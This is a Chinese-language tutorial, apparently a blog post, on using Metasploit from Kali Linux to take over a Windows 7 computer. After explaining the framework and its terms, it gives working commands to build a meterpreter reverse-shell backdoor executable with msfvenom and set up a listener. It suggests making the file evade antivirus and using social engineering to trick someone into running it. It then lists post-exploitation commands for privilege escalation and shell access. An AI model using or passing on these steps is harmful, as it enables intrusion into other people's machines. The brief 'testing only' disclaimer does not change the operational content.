kail linux 系統下利用metaspolit工具滲透win7電腦

 注：只是測試，不可干違法的事。

一、metaspolit工具的介紹

• 1.1、metaspolit 是一款開源安全漏洞檢測工具，附帶數百個已知的軟件漏洞，並保持頻繁更新。被安全社區冠以“可以黑掉整個宇宙”之名的強大滲透測試框架。
• 1.2、Metasploit是一款開源的安全漏洞檢測工具，同時Metasploit是免費的工具，因此安全工作人員常用Metasploit工具來檢測系統的安全性。
• 1.3、Metasploit Framework (MSF) 在2003年以開放源碼方式發布，是可以自由獲取的開發框架。它是一個強大的開源平台，供開發，測試和使用惡意代碼，這個環境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠         平台
• 1.4、這種可以擴展的模型將負載控制(payload)、編碼器(encode)、無操作生成器(nops)和漏洞整合在一起，使 Metasploit Framework 成為一種研究高危漏洞的途徑。它集成了各平台上常見的溢出漏洞和流行的 shellcode          並且不斷更新。

二、專業術語

• 滲透測試（Exploit）：指由攻擊者或滲透測試者利用一個系統、應用或服務中的安全漏洞，所進行的攻擊行為。能夠進行攻擊並得到目標系統控制權的惡意代碼。經典的exploit由payload和injector（注入程序）組成，payload負責取得系統的控制權，而注入程序負責將payload注射到相應的有漏洞的系統中；
• 攻擊載荷（Payload）：是我們期望目標系統在被滲透攻擊之后執行的代碼。其實就是廣義上的Shellcode，被翻譯為‘有效載荷’
• shellcode :：攻擊程序的核心代碼，能夠取得系統的攻擊權，一把是取得一個shell。是在滲透攻擊時作為攻擊載荷運行的一組機器指令，通常用匯編語言編寫。injector：相對shellcode來說，它實現加載和發送shellcode，提供返回地址等功能；
• 模塊（Module）：指Metaspolit框架中所使用的一段軟件代碼組件，可用於發起滲透攻擊或者行某些輔助攻擊。
  •  auxiliary
  • encoders
  • exploits 
  • nops 
  • payloads 
  • post 
• 監聽器（Listener）:是metaspolit中用來等待網絡連接的組件。

二、metaspolit工具的簡單使用

三、小實驗：利用metaspolit工具滲透win7電腦

流程如下：

1、使用工具：kail Linux 系統（IP：192.168.31.54） 

　　　　　　 win7 系統（IP：192.168.31.136）

2、步驟：　　

1、首先在kali上制作一個后門程序。文件名為：openme.exe
       命令：
            msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.54 LPORT=5050 -f exe -o setup.exe
            #本地監聽地址及端口號：192.168.31.54：5050  
    2、為生成的文件 openme.exe 賦予可執行的權限，如果有必要可以對該文件執行免殺
       命令：    
            chmod 777 openme.exe
    3、打開msf，加載exploit/multi/handler模塊，同時設置本地主機地址，本地端口
       命令：msfconsole  
            msf > use exploit/multi/handler
            msf exploit(handler) > set lhost 192.168.31.54
            msf exploit(handler) > set lport 5050
    4、開始執行滲透攻擊並監聽
       命令：
            msf exploit(handler) > exploit -z -j
    5、此時，你可以將文件發給其他人，利用社會工程學知識讓別人在他的win7系統上打開該文件，那么你的目的就達到了
    6、后門程序反向連接到msf，msf發起第二次攻擊（開始滲透），然后客戶端（后門程序）連接到服務端（msf）。
       如圖你在你kali上會有一個session。你攻陷了別人的主機並拿到了shell，還有session信息。
       命令：
            msf exploit(handler) > sessions
            msf exploit(handler) > sessions -i 1
            meterpreter > shell
    7、入侵成功之后可操作win7電腦
        getsystem        #會自動利用各種各樣的系統漏洞來進行權限提升
        migrate          #進程id進程遷移
        background       #把當前的會話設置為背景，需要的時候在啟用
        getuid          #查看對方正在運行的用戶
        ps   #列出所有的進程
        getpid      #返回運行meterpreter的id號
        sysinfo       #產看系統信息和體系結構
        shell    #切換到cmd的系統權限方式

3、運行結果截圖

查看本地的IP

　

用msfvenom生成exe文件，並賦予權限

啟動metaspolit

 設置本地IP地址和端口並且攻擊

當對方打開exe文件的時候，會生成一個session會話，如下圖所示

 

 現在就可以操作別人電腦了，如下圖：